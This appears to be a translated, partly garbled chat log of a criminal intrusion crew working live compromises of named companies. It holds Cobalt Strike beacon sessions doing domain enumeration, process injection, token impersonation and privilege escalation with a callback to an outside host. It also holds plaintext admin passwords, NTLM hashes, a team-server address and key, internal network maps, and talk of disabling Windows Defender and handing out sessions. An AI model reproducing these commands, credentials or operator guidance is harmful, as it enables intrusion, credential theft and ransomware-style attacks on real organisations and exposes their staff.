>proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@total2257.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@2257.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluecastvod.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@redgalaxy.com >proxyAddresses: SMTP:GFIME_MOVEEXCH_USER@adultdvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@gaydvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvd.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@stripclubdatabase.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstardata.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dvdempire.lan >proxyAddress What is the real one? At the end of the fucking dvdempire.lanmbh mobile user and works through wifiColleagues, I'm writing a note to the general channel! In the process of mstsc.exe I have not worked shell with the following error: ``` [-] Could not connect to pipe: 2 ``` The right solution to this error was Inject to another process, namely rundll32.exe Now I use the command line without knowing what to do! ðrnvpna\Not finding PO mzt+ there is one more available@user7 your back `BEngeron@192.168.0.19 (LP-BC8DTT2)`ifconf did not show anything, now check cf@user1 your back Checking for signs of vpn? who died could come back Check input codeNo connection On the second `LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. `Nothing comes up net domain and AD find doesn't strat why? Mm-hmm>mail: KMartin@snpartners.com >proxyAddresses: SMTP:KMartin@snpartners.comАД not removed probably snpartners.com what are the names of the fields? look - there are lots of emails on domains in users https://www.snpartners.com/ https://www.martinsullivan.com/ https://www.snpartners.com/ they all have something to do with john deereOne FMP.local2 came@user3 take it away there +1 session new where did you download the ad users? 
I downloaded there above - there names as autogenerated take the ad users and watch it then sure not av lab121 mb file for ad users - even in the terminal all do not fit into the terminal what about ad? 172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN) 172.31.190.11:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN) [+] received output: 172.31.190.12:445 (platform: 500 version: 10.0 name: JDODC65 domain: JDOSSN) 172.31.190.16:445 (platform: 500 version: 6.3 name: JDOFIEECONN01 domain: JDOSSN) 172.31.190.17:445 (platform: 500 version: 10.0 name: JDODHCP02 domain: JDOSSN) [+] received output: 172.31.190.47:445 (platform: 500 version: 10.0 name: JDODC67 domain: JDOSSN) 172.31.190.62:445 (platform: 500 version: 6.3 name: JDOCHOPS12 domain: JDOSSN) 172.31.190.66:445 (platform: 500 version: 6.3 name: JDOCHSVC12 domain: JDOSSN) 172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN) 172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN) 172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN) 172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN) Scanner module is complete ``20 min It hung There are 10 in progress+do all groups have this address in their mail? I think so. E-mail: briancarroll@directmail.com ``This isn't porn://www.bigassfans.com/via powershell by the user either``` Name : Private Dashboard | Big Ass Fans URL : https://bigassfans.myabsorb.com/#/dashboard ``Real domain and I'm creating a confab, hell info I didn't ask for it. Why? @user9.local doesn't count @user3 the main domain is real and I'll create a chat room - Austin.SilencerShop.comWill you make groups not to litter here? @tl1thinks it's real@user9 browser still check it outAre there any trusts @user9? 
seems normal, few machines and users 133/68``` Host Name: MMURPHY OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18362 N/A Build 18362 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: helpdesk Registered Organization: N/A Product ID: 00330-80136-38831-AA714 Original Install Date: 3/5/2020, 7:55:40 AM System Boot Time: 10/15/2020, 3:13:39 PM System Manufacturer: Microsoft Corporation System Model: Surface Laptop 3 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 126 Stepping 5 GenuineIntel ~1198 Mhz BIOS Version: Microsoft Corporation 7.124.140, 6/23/2020 Windows Directory: C:\windows System Directory: C:{windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 7,782 MB Available Physical Memory: 3,868 MB Virtual Memory: Max Size: 8,998 MB Virtual Memory: Available: 4,426 MB Virtual Memory: In Use: 4,572 MB Page File Location(s): C:\pagefile.sys Domain: DMGROUP Logon Server: \CYMA17 Hotfix(s): 9 Hotfix(s) Installed. [01]: KB4578974 [02]: KB4497727 [03]: KB4521863 [04]: KB4561600 [05]: KB4576751 [06]: KB4576754 [07]: KB4577670 [08]: KB4580325 [09]: KB4577671 Network Card(s): 4 NIC(s) Installed. 
[01]: Intel(R) Wi-Fi 6 AX201 160MHz Connection Name: Wi-Fi Status: Media disconnected [02]: Bluetooth Device (Personal Area Network) Connection Name: Bluetooth Network Connection Status: Media disconnected [03]: TAP-Windows Adapter V9 Connection Name: Local Area Connection Status: Media disconnected [04]: DisplayLink Network Adapter NCM Connection Name: Ethernet 3 DHCP Enabled: Yes DHCP Server: 172.16.4.69 IP address(es) [01]: 172.16.4.42 [02]: fe80::59eb:2e4:28b8:70ee Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ``Trend Mycrots have one more free session available and check out the users `` Host Name: W08872612198 OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18362 N/A Build 18362 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: W08872612198 Registered Organization: N/A Product ID: 00330-52406-72961-AAOEM Original Install Date: 12/5/2019, 6:01:44 PM System Boot Time: 9/23/2020, 12:22:08 AM System Manufacturer: Dell Inc. System Model: OptiPlex 5070 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz BIOS Version: Dell Inc. 1.2.1, 11/14/2019 Windows Directory: C:\Windows System Directory: C:{Windows\system32 Boot Device: \Device\HarddiskVolume3 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-06:00) Central Time (US & Canada) Total Physical Memory: 16.166 MB Available Physical Memory: 8.825 MB Virtual Memory: Max Size: 18,598 MB Virtual Memory: Available: 8,859 MB Virtual Memory: In Use: 9,739 MB Page File Location(s): C:\pagefile.sys Domain: jdossn.local Logon Server: \JDODC12 Hotfix(s): 14 Hotfix(s) Installed. 
[01]: KB4552931 [02]: KB4497165 [03]: KB4497727 [04]: KB4515383 [05]: KB4516115 [06]: KB4524569 [07]: KB4528759 [08]: KB4537759 [09]: KB4560959 [10]: KB4561600 [11]: KB4565554 [12]: KB4569073 [13]: KB4576751 [14]: KB4574727 Network Card(s): 2 NIC(s) Installed. [01]: Intel(R) Ethernet Connection (7) I219-V Connection Name: Ethernet DHCP Enabled: Yes DHCP Server: 172.31.190.17 IP address(es) [01]: 10.51.128.172 [02]: fe80::896f:a415:af2d:57b1 [02]: Intel(R) Wireless-AC 9560 160MHz Connection Name: Wi-Fi Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ``What's the axis? Because without AV? [+] Determining what EDR products are installed on localhost... [+] No EDR products found! Operate at your own risk! `````` beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" [*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86) [+] host called home, sent: 125019 bytes [+] received output: ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational. 
ERROR: " ERROR: ERROR: At line:5253 char:52 ERROR: + else { $Results = $UserSearcher.FindAll <<<< () } ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : DotNetMethodException ERROR: ``The ad_users in the mail address will be the real domain, if it will be .local then most likely something is wrong, check processes first, browser, ad infochet names are strange...`` txbaybcraig txbaybcware TXBayCGarza txbaycharki txbaycphill txbaydblake txbayecooke TXBayFBanks TXBayGHebel TXBayGLane txbayjwille TXBayKSchoe txbaymkurz txbaymobile txbayoffice TXBayParts txbayparts2 txbayrmedin TXBayRSeide txbayrvince txbayrzenke txbaysdtv txbaytech1 txbaytech10 txbaytech11 txbaytech12 txbaytech2 txbaytech3 txbaytech4 txbaytech5 txbaytech6 txbaytech7 txbaytech8 txbaytech9 TXBayTechn txbaytechn2 txbaytlucas TXBayTStein txbaywhouse TXBea4PBeau txbeaablanc txbeabblack txbeacsory txbeacthibo TXBeaDBertino txbeadblanc TXBeaDLivin txbeadrive1 txbeajborda txbeajbowen txbeajlariv txbeajleach TXBeaKHoffm txbeaklee ``try to take off through the shell didn't create through run just displayed a list of name+group through the shell did not work with the same error is it an external domain? try to run adfind.exe directly without ``button beacon> run AdFind.bat [*] Tasked beacon to run: AdFind.bat [+] host called home, sent: 347720 bytes [-] could not spawn AdFind.bat: 5 ``within run? 
beacon> shell AdFind.bat [*] Tasked beacon to run: AdFind.bat [+] host called home, sent: 41 bytes [-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5 beacon> shell dir [*] Tasked beacon to run: dir [+] host called home, sent: 34 bytes [-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5 ``Not localreal domains plz'' usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: WOSupply.local ``Look at the aduser and tell me if it happens or not, but it seems to be a real session ``` beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 231 bytes [+] received output: BigAssFan.local ``or reality? is it a trickBigAssFan.local on the classic - get the session, write the domain here, create a confab and then as usual for nothing good, thank youmaximum you will look for profiles for the team server do not think tomorrow will throw the guide, it is as understandable tomorrow will be no questions questions? tomorrow you and I will deal with cob settings and other things, with servers today will solve the problem plan following ``` 104.194.11.160:41476 SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR ``` here come the sessions, separate the AV/Honey from the normal networks and work with them, the coba is clean, you can pass yourself from here or work in it, depends on the dirt your kobya already wrote about it so we were told to fuck up now, so less you fuck up later because you busy@user7 about the coba later it's familiar ?I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams how do you prepare the cob ?well, here's how you get the sessions ? @tl2 and silence, thank you at least for such answers (ok, then how to configure ? 
setup - please if you do not know where to get servers I will not tell you @user8 already wrote to yourself think about it, so we first want an answer to this question, where and how can you tell us ? first thing: take servers where will? what, how and why do we need to know the procedure for getting sessions on the cob 1. how to prepare a cobu 2. what to do 3. how to do it correctly 4. the principles of work to explain everything we need to bring it to us this allcoba need an algorithm for obtaining a new coba for each day with new configs, gaskets, servers clean after configurations? next after what? hmm. let's say, what next? or how to understand what I wrote? thank you all clear server registration, configuration of a web server with a domain and ssl which is sent to the server kobys hear hearPlease hear my cry from the soul !A to Z needs a complete scheme, not links to gita@tl1 @tl2 and about "spacers" in detail and the whole list of preparations setup cobo Explain in full the principle of getting cob@tl1 @tl2 Please take 10-15 minutes now, than to be distracted by our pings with stupid questions@tl1 @tl2 How do I make sure the cobs arrive without pestering you with this? after 10 da@tl1 @tl2what about today's nets?:smirk: you will be the last one in any case) tell me if there are mistakes, otherwise it will not work and I will be the last one to blame! https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/are there any linguists? 
проверьте https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/ну if they are finished it is unlikely there is anything else to do there also mother-in-law lpe exploits translate the guide to disable vin def for the forum nonstop check everything to have time to deal with the forum and additional modules neah (the old have not arrived? nah (no sessions?) helloHi all if there are sessions - wait so are we done? better get a "local" admin if you're inside your trust domain i haven't changed passwords? beacon> make_token saig.frd.global\adm.soucam1 chs@1944! [*] Tasked beacon to create a token for saig.frd.global\adm.soucam1 [+] host called home, sent: 55 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell tasklist /s 10.195.23.14 /v [*] Tasked beacon to run: tasklist /s 10.195.23.14 /v [+] host called home, sent: 58 bytes [+] received output: ERROR: Logon failure: unknown user name or bad password. ``1 out of 3 should hit)`` and you try the other 2 Password expires 11/10/2018 6:46:28 PM `````` beacon> shell net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008 [*] Tasked beacon to run: net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008 [+] host called home, sent: 109 bytes [+] received output: System error 2242 has occurred. The password of this user has expired. ``then look at the program files`` beacon> shell tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008 [*] Tasked beacon to run: tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008 [+] host called home, sent: 102 bytes [+] received output: ERROR: The RPC server is unavailable. ``Try directly specifying accesses without tokenvot 3 pcs``. adm.ravven0:Need2learn2008 `````` adm.taydav1:G0d1sr3al! 
`````` adm.turime0:Concentrada2 `````` 1210 adm.kinzac1 52ab4557416b5fd8dfeed6e329db05fb 512 1199 adm.turime0 aa94145c9f2d8a1cea6b554049fe7c1d 512 1207 adm.matdmy0 43527144907fdc17ccf21dac8f24a39c 66048 1202 adm.kalnic0 d9c4c5a3dca64991399474767d6276b9f9 512 500 c360.datacentre 1cd6234cdaf74494d8689cd56317637c 66048 1205 adm.bisfra0 0e36ddd194d4b863966cf521fd6e683e 512 1216 adm.facjoe0 c58e6ce4e121d1c79ff799b42898121d 512 1118 adm.ravven0 ebc8defb32dea60e9ed2470e6810a76b 512 1218 adm.taydav1 03e9c6b99ff2bbdf6f8c39af19e1b7d0 512 I'll check 5 or 6[ ](https://mediaeveryone.com/group/saiglobal-com?msg=CtE7inA3av5aGBwhy) and give me the hashes of the critical infrastructural servers required for domain authentication but if there is also some balloon there, you can leave the markdomen controllers always necessarily remain in a separate groupclearcred no then another yes, with clearedcreds >operatingSystem: Windows Server 2012 R2 Standard >operatingSystemVersion: 6.3 (9600) ``` ``` beacon> portscan 10.195.13.14 445,139 icmp 1024 [*] Tasked beacon to scan ports 445,139 on 10.195.13.14 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.195.13.14' is alive. [read 8 bytes] 10.195.13.14:139 10.195.13.14:445 (platform: 500 version: 6.3 name: AUHDC1-CSPSQL10 domain: C360) Scanner module is complete Try it with a direct kred indication? which os, domain will it detect? 
and portscan 139 445 on this pc
```
beacon> shell net user adm.ji0lei0 /dom
[*] Tasked beacon to run: net user adm.ji0lei0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name                    adm.ji0lei0
Full Name                    Admin - Leida Ji
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            30/08/2018 6:46:28 PM
Password expires             11/10/2018 6:46:28 PM
Password changeable          31/08/2018 6:46:28 PM
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.
```
``net user - give it the token``
yes
from which one is the account active? and what is the error?
with "c360.local"
dir also gives nothing with the token
YES (account is active, credentials are valid)
```
beacon> shell dir \\10.195.13.14\c$
[*] Tasked beacon to run: dir \\10.195.13.14\c$
[+] host called home, sent: 52 bytes
[+] received output:
Access is denied.
```
``I tried it on 3 different machines``
```
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
```
What? RDS? Is there a CmRcService in Terminal Server? Does it have >memberOf: CN=Terminal Server License Servers,CN=Builtin,DC=datacenter,DC=local
@tl1 if the PC has OU=Corporate IT, is it possible to put it into such a subgroup when sorting?
services from AD, processes are taken when nothing is clear from the AD info: the list of processes, its group, description in AD, etc.
viewing the group policies for the sake of understanding the structure of the network - just a great idea
and what method exactly? and what kind of information is needed that is so special?
ah, well, yes, I did a separate thread ... at least these went into quarantine ...
```
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```
``We've had a change in communications, it was in the forum.``
```
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-15:34:59 AUS Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-15:05:33 AUS Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]

dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/03-13:18:37 AUS Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=leaders.frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2011/01/18-14:59:38 AUS Eastern Daylight Time
>name: leaders.frd.global
>securityIdentifier: S-1-5-21-888074932-249386324-1990136273
>trustDirection: 1 [Inbound(1)]
>trustPartner: leaders.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/04/18-13:02:07 AUS Eastern Daylight Time
>name: standards.com.au
>securityIdentifier: S-1-5-21-8915387-1104766828-763373030
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: standards.com.au
>trustType: 2 [UpLevel(2)]
>trustAttributes: 0 []

dn:CN=saig.frd.global,CN=System,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/05/19-14:26:44 AUS Eastern Daylight Time
>name: ad-apse2.np.aws.saig
>securityIdentifier: S-1-5-21-199586283-846828525-2273482586
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-apse2.np.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/11-17:21:06 AUS Eastern Daylight Time
>name: ad-usea1.np.aws.saig
>securityIdentifier: S-1-5-21-3403532533-1899797052-316633242
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-usea1.np.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-apse2.build.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/12-11:16:33 AUS Eastern Daylight Time
>name: ad-apse2.build.aws.saig
>securityIdentifier: S-1-5-21-2542211190-1088484194-4279143674
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-apse2.build.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/11/08-13:27:58 AUS Eastern Daylight Time
>name: ad-euce1.prd.aws.saig
>securityIdentifier: S-1-5-21-3050823117-3304142573-3876120398
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-euce1.prd.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2018/01/15-20:16:54 AUS Eastern Daylight Time
>name: ad-usea1.prd.aws.saig
>securityIdentifier: S-1-5-21-2974031555-4010838971-2461281460
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-usea1.prd.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/14-00:59:37 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=c360uk.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/17-20:20:15 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-15:56:50 AUS Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/07/23-20:59:31 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=ad-apse2.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2019/07/24-18:10:06 AUS Eastern Daylight Time
>name: ad-apse2.prd.aws.saig
>securityIdentifier: S-1-5-21-3745473896-2843996748-977219772
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ad-apse2.prd.aws.saig
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

19 Objects returned
```
Well, now that you mention processcolour, here you go https://github.com/icebearfriend/Quickrundown
alas, it's a wildly tedious pdf, but sometimes if you look at it a bit it's informative)
if it's processcolor.cna, throw it over
Good for you, it's more about trusts and attributes and stuff xD
hope that something else can shoot, hell...
Lol no, we did not throw it specially
you can take all the trusts in the domain in one command
now I will throw you a cool thing which I should have given long ago ...
but okay, at least it was self-critical xD
yes, I'm a stupid animal, what can I say
here was with *[ ](https://mediaeveryone.com/group/saiglobal-com?msg=RhSbHC2uoMM5zoivr) 100% there was a session under the admin and you tried to bypass the UAC, yes?
```
user 2-2[AUHDC1-SPPDC01]SYSTEM */4576|2020Oct06 01:15:50> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:
0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound)
1: SAIGPROD saigProd.local (Forest tree root) (Primary Domain) (Native)
```
```
>trustAttributes: 32 [Within-Forest(32)]
```
In a forest, respectively, it can be a trust
A transitive trust is a trust that is extended not only to a child object, but also to each object that the child trusts. (In contrast, a non-transitive trust extends only to one object.)
there's a session under a local user or something
ah, it's ok
so are you an admin?
I can't get SYSTEM on datacenter.local, it's win serv 2016
```
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) via Service Control Manager (\\127.0.0.1\ADMIN$\b59b87e.exe)
[+] host called home, sent: 291370 bytes
[-] Could not start service b59b87e on .: 225
```
what to do?
```
beacon> shell ping -n 1 frd.global
[*] Tasked beacon to run: ping -n 1 frd.global
[+] host called home, sent: 51 bytes
[+] received output:
Pinging frd.global [10.225.12.1] with 32 bytes of data:
Reply from 10.225.12.1: bytes=32 time<1ms TTL=128
Ping statistics for 10.225.12.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
beacon> shell ping frd.global
[*] Tasked beacon to run: ping frd.global
[+] host called home, sent: 46 bytes
[+] received output:
Pinging frd.global [10.195.25.98] with 32 bytes of data:
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Ping statistics for 10.195.25.98:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 206ms, Maximum = 206ms, Average = 206ms
```
``@tl2 tell me please the difference between transitive and forest?``
This is from the current one
```
dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-00:18:22 Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]
```
``oh, transitive + does it see it?``
```
dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
```
`datacenter.local`
```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
